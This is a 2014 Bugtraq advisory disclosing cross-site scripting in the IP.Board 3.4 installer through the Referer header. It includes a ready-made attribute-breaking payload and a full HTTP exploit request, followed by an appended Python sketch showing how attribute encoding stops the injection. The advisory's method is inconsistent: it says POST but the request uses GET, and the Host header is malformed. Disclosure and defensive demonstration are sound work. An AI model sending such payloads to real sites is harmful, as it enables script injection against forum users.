Message-Id: <201407162126.s6GLQh0C002427@sf01web2.securityfocus.com>
Date: Wed, 16 Jul 2014 21:26:43 GMT
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: IP.Board 3.4 cross-site scripting in Referer header

+--------------------------------------------------------------------
+
+ IP.Board 3.4 cross-site scripting in Referer header
+
+--------------------------------------------------------------------
+ vendor site........: http://www.invisionpower.com
+ Affected Software .: IP.Board 3.4
+ Class .............: XSS
+ Risk ..............: high
+ Found by ..........: Ahmed atif abdou [ OCERT Ambassador Program - Oman National CERT ]
+ Facebook .: https://www.facebook.com/runvirus
+ Contact ...........: stormhacker[at]hotmail[.]com
+--------------------------------------------------------------------

[X] Affected Products:
=========================
Tested on IP.Board 3.4.6 and IP.Board 3.4.4.

May work under 3.4.


[X] About the application:
=========================

IP.Board is the leading solution for creating an engaging discussion forum on the web.


[X] Vulnerability Description:
===============================
The attack works under the above-mentioned conditions. It requires sending a

POST request to http://path_forum/admin/install/index.php

with the Referer header set:

Referer: 1" onmouseover=prompt(947671) bad="


[X] Exploit :
===============================

GET /admin/install/index.php HTTP/1.1
Referer: 1" onmouseover=prompt(11111111) bad="
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Cookie:
Host: localhost/admin/install/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

[X] Video proof :
===============================
https://www.youtube.com/watch?v=WYm4C611eyU&feature=youtu.be

+--------------------------------------------------------------------
+
+ Greets:
+ || rUnViRuS || - || Providor ||
+-------------------------[ W D T ]----------------------------------
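
Added example, not part of the original advisory and not IP.Board code: the payload above closes a double-quoted HTML attribute, so this sketch reflects the Referer value into a hypothetical template with and without attribute encoding and shows what an HTML parser then sees. The template and function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Referer value quoted in the advisory.
ADVISORY_REFERER = '1" onmouseover=prompt(947671) bad="'

# Hypothetical template: the advisory does not show the installer's markup,
# only that the payload closes a double-quoted attribute.
TEMPLATE = '<a href="{referer}">Back</a>'


def render_unsafe(referer: str) -> str:
    """Reflects the header verbatim (the flawed pattern)."""
    return TEMPLATE.format(referer=referer)


def render_safe(referer: str) -> str:
    """Encodes &, <, >, " and ' before placing the value in the attribute."""
    return TEMPLATE.format(referer=html.escape(referer, quote=True))


class _AttrCollector(HTMLParser):
    """Records the attributes of the <a> start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs = dict(attrs)


def parsed_attributes(markup: str) -> dict:
    """Returns the attributes an HTML parser sees on the <a> element."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(name, parsed_attributes(render(ADVISORY_REFERER)))
```

In the unencoded output the parser reports a separate onmouseover attribute; in the encoded output the whole header value stays inside href.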
